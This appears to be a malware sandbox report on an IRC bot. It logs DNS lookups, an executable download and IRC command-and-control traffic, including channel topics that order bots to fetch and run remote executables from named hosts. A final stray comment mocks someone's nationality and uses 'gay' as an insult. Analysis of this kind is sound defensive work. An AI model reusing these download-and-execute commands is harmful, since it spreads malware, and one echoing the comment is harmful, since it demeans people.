– DNS Queries:
net.anddos.co.uk DNS_TYPE_A 94.75.216.31 1
wpad DNS_TYPE_A 0
www.sevgideyim.com DNS_TYPE_A 91.194.90.92 1
– HTTP Conversations:
91.194.90.92:80 – [www.sevgideyim.com]
Request: GET /resimlerim.exe
Response: 200 “OK”
– IRC Conversations:
94.75.216.31:6667
Nick: [nLh-VNC]ewuowy
Username: qtykph
Joined Channel: #dbot with Password pass
Channel Topic for Channel #dbot: “.h download http://www.sevgideyim.com/resimlerim.exe c:sdffd.exe 1 ”
Private Message to Channel #dbot: “RAGE: file running: 128 KB.”
Private Message to Channel #dbot: “Samuray ^C13Ananxfd sikkkkeeeeRimmmmmm Gxf6txfcnden”
Outgoing Connections
HTTP Data
Method: GET
Url: 94.75.216.31/~anddos/rap/lsass3.exe
HTTP Version: HTTP/1.1
Header Data
User-Agent: Mozilla
Host: 94.75.216.31:85
IRC Data
User Name: utlncz
Host Name: “”
Server Name:
Real Name: utlncz
Password: dickybob
Nick Name: aiatqo
Non RFC Conform: 1
Channel
Name: #ohai
Password: 0day
Topic Deleted: :.dl http://94.75.216.31:85/~anddos/rap/lsass3.exe c:lsass3.exe 1
Notice Message Deleted
Value: :irc.goonet.net NOTICE AUTH :*** Looking up your hostname…
Value: :irc.goonet.net NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
anddos i was surprised when i saw u are turkish hahah now that other turkish gay d0lar is going to talk shit with you lol